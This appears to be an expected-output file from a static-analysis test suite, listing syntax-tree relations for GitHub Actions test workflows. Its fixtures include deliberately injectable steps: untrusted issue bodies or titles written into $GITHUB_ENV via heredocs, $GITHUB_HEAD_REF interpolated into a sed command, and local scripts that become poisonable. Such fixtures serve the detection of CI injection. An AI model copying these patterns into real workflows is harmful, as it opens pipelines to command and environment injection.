.github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | 